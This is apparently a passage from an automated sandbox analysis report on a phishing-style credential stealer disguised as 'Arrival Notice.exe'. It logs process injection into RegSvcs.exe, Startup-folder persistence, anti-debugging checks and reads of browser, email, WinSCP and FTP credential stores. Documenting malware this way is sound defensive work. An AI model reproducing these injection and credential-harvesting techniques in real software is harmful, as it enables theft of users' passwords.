                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 95641Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 95532Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 95407Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 95282Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 95172Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 95063Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 94952Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 94842Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 94733Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 94609Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 94469Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 94360Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 94219Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 94110Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 100000Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99890Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99781Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99671Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99562Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99453Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99343Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99234Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99125Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99015Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98901Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98793Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98687Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98577Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98468Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98359Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98250Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98138Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98031Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97921Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97812Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97702Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97593Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97484Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97375Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97265Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97140Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97027Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 96921Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 96794Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 96687Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 96578Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 96468Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 96359Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 96250Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 96140Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 96031Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 95921Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 95812Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 95703Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 95593Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 95484Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 95375Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 95265Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 95140Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 95031Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 94921Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 94812Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 94703Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 94593Jump to behavior
                    Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Jump to behavior
                    Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Jump to behavior
                    Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Jump to behavior
                    Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\Jump to behavior
                    Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Jump to behavior
                    Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Jump to behavior
                    Source: RegSvcs.exe, 00000006.00000002.4537874564.0000000005CF2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll7
                    Source: RegSvcs.exe, 00000006.00000002.4535339176.0000000003B38000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: IHgfSrloXJZ42t0KsSckkZ5OeaxVhmdXZbeZlj++RExC8Z54445qNTvZAoYmQZQBT8w9
                    Source: RegSvcs.exe, 00000003.00000002.2228660326.0000000005FFF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: C:\Users\user\Desktop\Arrival Notice.exeAPI call chain: ExitProcess graph end nodegraph_0-99109
                    Source: C:\Users\user\Desktop\Arrival Notice.exeAPI call chain: ExitProcess graph end nodegraph_0-99175
                    Source: C:\Users\user\AppData\Local\directory\name.exeAPI call chain: ExitProcess graph end node
                    Source: C:\Users\user\Desktop\Arrival Notice.exeCode function: 0_2_009441FD BlockInput,0_2_009441FD
                    Source: C:\Users\user\Desktop\Arrival Notice.exeCode function: 0_2_008D3B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_008D3B4C
                    Source: C:\Users\user\Desktop\Arrival Notice.exeCode function: 0_2_00905CCC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_00905CCC
                    Source: C:\Users\user\Desktop\Arrival Notice.exeCode function: 0_2_0094C304 LoadLibraryA,GetProcAddress,0_2_0094C304
                    Source: C:\Users\user\Desktop\Arrival Notice.exeCode function: 0_2_014C3500 mov eax, dword ptr fs:[00000030h]0_2_014C3500
                    Source: C:\Users\user\Desktop\Arrival Notice.exeCode function: 0_2_014C34A0 mov eax, dword ptr fs:[00000030h]0_2_014C34A0
                    Source: C:\Users\user\Desktop\Arrival Notice.exeCode function: 0_2_014C1E70 mov eax, dword ptr fs:[00000030h]0_2_014C1E70
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_015B3500 mov eax, dword ptr fs:[00000030h]2_2_015B3500
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_015B34A0 mov eax, dword ptr fs:[00000030h]2_2_015B34A0
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_015B1E70 mov eax, dword ptr fs:[00000030h]2_2_015B1E70
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 5_2_02173500 mov eax, dword ptr fs:[00000030h]5_2_02173500
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 5_2_021734A0 mov eax, dword ptr fs:[00000030h]5_2_021734A0
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 5_2_02171E70 mov eax, dword ptr fs:[00000030h]5_2_02171E70
                    Source: C:\Users\user\Desktop\Arrival Notice.exeCode function: 0_2_009281F7 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_009281F7
                    Source: C:\Users\user\Desktop\Arrival Notice.exeCode function: 0_2_008FA395 SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_008FA395
                    Source: C:\Users\user\Desktop\Arrival Notice.exeCode function: 0_2_008FA364 SetUnhandledExceptionFilter,0_2_008FA364
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_001DA364 SetUnhandledExceptionFilter,2_2_001DA364
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_001DA395 SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_001DA395
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMemory allocated: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and writeJump to behavior
                    Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and writeJump to behavior
                    Source: C:\Users\user\AppData\Local\directory\name.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: A8B008Jump to behavior
                    Source: C:\Users\user\AppData\Local\directory\name.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 6E2008Jump to behavior
                    Source: C:\Users\user\Desktop\Arrival Notice.exeCode function: 0_2_00928C93 LogonUserW,0_2_00928C93
                    Source: C:\Users\user\Desktop\Arrival Notice.exeCode function: 0_2_008D3B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_008D3B4C
                    Source: C:\Users\user\Desktop\Arrival Notice.exeCode function: 0_2_008D4A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_008D4A35
                    Source: C:\Users\user\Desktop\Arrival Notice.exeCode function: 0_2_00934EC9 mouse_event,0_2_00934EC9
                    Source: C:\Users\user\AppData\Local\directory\name.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\Arrival Notice.exe"Jump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\directory\name.exe "C:\Users\user\AppData\Local\directory\name.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Local\directory\name.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\directory\name.exe" Jump to behavior
                    Source: C:\Users\user\Desktop\Arrival Notice.exeCode function: 0_2_009281F7 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_009281F7
                    Source: C:\Users\user\Desktop\Arrival Notice.exeCode function: 0_2_00934C03 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_00934C03
                    Source: Arrival Notice.exe, name.exe.0.drBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                    Source: Arrival Notice.exe, name.exeBinary or memory string: Shell_TrayWnd
                    Source: C:\Users\user\Desktop\Arrival Notice.exeCode function: 0_2_008F886B cpuid 0_2_008F886B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Arrival Notice.exeCode function: 0_2_009050D7 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_009050D7
                    Source: C:\Users\user\Desktop\Arrival Notice.exeCode function: 0_2_00912230 GetUserNameW,0_2_00912230
                    Source: C:\Users\user\Desktop\Arrival Notice.exeCode function: 0_2_0090418A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_0090418A
                    Source: C:\Users\user\Desktop\Arrival Notice.exeCode function: 0_2_008D4AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_008D4AFE
                    Source: C:\Users\user\Desktop\Arrival Notice.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Stealing of Sensitive Information

                    barindex
                    Source: Yara matchFile source: dump.pcap, type: PCAP
                    Source: Yara matchFile source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.name.exe.3950000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.name.exe.15d0000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.name.exe.3950000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.name.exe.15d0000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000003.00000002.2226892130.0000000002EA4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.2226892130.0000000002E9C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.2086913169.00000000015D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.2225248989.0000000003950000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.2226892130.0000000002E71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.2224272082.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000002.4531977929.000000000299B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: name.exe PID: 2748, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 5144, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: name.exe PID: 5052, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 3632, type: MEMORYSTR
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.iniJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.iniJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\FTP Navigator\Ftplist.txtJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                    Source: name.exeBinary or memory string: WIN_81
                    Source: name.exeBinary or memory string: WIN_XP
                    Source: name.exeBinary or memory string: WIN_XPe
                    Source: name.exeBinary or memory string: WIN_VISTA
                    Source: name.exeBinary or memory string: WIN_7
                    Source: name.exeBinary or memory string: WIN_8
                    Source: name.exe.0.drBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 5USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte
                    Source: Yara matchFile source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.name.exe.3950000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.name.exe.15d0000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.name.exe.3950000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.name.exe.15d0000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000002.00000002.2086913169.00000000015D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.2225248989.0000000003950000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.2226892130.0000000002E71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.2224272082.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000002.4531977929.000000000299B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: name.exe PID: 2748, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 5144, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: name.exe PID: 5052, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 3632, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Source: Yara matchFile source: dump.pcap, type: PCAP
                    Source: Yara matchFile source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.name.exe.3950000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.name.exe.15d0000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.name.exe.3950000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.name.exe.15d0000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000003.00000002.2226892130.0000000002EA4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.2226892130.0000000002E9C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.2086913169.00000000015D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.2225248989.0000000003950000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.2226892130.0000000002E71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.2224272082.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000002.4531977929.000000000299B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: name.exe PID: 2748, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 5144, type: MEMORYSTR
